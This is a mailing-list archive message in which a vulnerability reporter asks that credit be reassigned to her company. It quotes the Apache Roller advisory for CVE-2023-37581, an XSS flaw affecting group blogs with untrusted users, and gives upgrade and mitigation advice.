[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: CVE-2023-37581: Apache Roller: XSS vulnerability for site with untrusted users
From:       Srivani Reddy <srivani.reddy () securelayer7 ! net>
Date:       2023-08-16 3:45:35
Message-ID: MAXPR01MB350100A5BBBD4B0E8AE07E79D015A () MAXPR01MB3501 ! INDPRD01 ! PROD ! OUTLOOK ! COM
[Download RAW message or body]


Hi Dave,

Can you please change the name Srivani Reddy to our company SecureLayer7 Te=
chnologies Pvt Ltd as we submitted the vulnerability?

Regards,
Srivani


________________________________
From: Dave <snoopdave@gmail.com>
Sent: Sunday, August 6, 2023 1:42:26 AM
To: Apache Security Team <security@apache.org>; oss-security@lists.openwall=
.com <oss-security@lists.openwall.com>; Srivani Reddy <srivani.reddy@secure=
layer7.net>; dev@roller.apache.org <dev@roller.apache.org>; Roller User <us=
er@roller.apache.org>
Subject: CVE-2023-37581: Apache Roller: XSS vulnerability for site with unt=
rusted users


The Apache Roller project would like to announce a vulnerability that may i=
mpact Roller installations that allow group blogging with untrusted users.

Severity:

Medium (only impacts group blogging sites with untrusted users)

Description:

Insufficient input validation and sanitation in Weblog Category name, Websi=
te About and File Upload features in all versions of Apache Roller on all p=
latforms allows an authenticated user to perform an XSS attack.

Mitigation:

If you are not running a group blog, then no mitigation is needed. If you a=
re running a group blog and you do not have Roller configured for untrusted=
 users, then you need to do nothing because you trust your users to author =
raw HTML and other web content.

But, if you are running a group blog and you do not trust your users to aut=
hor HTML, CSS and JavaScript then you should upgrade to Roller 6.1.2 and yo=
u should disable Roller's File Upload feature. Roller 6.1.2 is available fo=
r download here: https://roller.apache.org/downloads/downloads.html

Apache Roller would like to thank Srivani Reddy for reporting this vulnerab=
ility.


This email and any files transmitted with it are confidential and intended =
solely for the use of the individual or entity to whom they are addressed. =
If you have received this email in error please notify the system manager. =
This message contains confidential information and is intended only for the=
 individual named. If you are not the named addressee you should not dissem=
inate, distribute or copy this e-mail. Please notify the sender immediately=
 by e-mail if you have received this e-mail by mistake and delete this e-ma=
il from your system. If you are not the intended recipient you are notified=
 that disclosing, copying, distributing or taking any action in reliance on=
 the contents of this information is strictly prohibited.


[prev in list] [next in list] [prev in thread] [next in thread]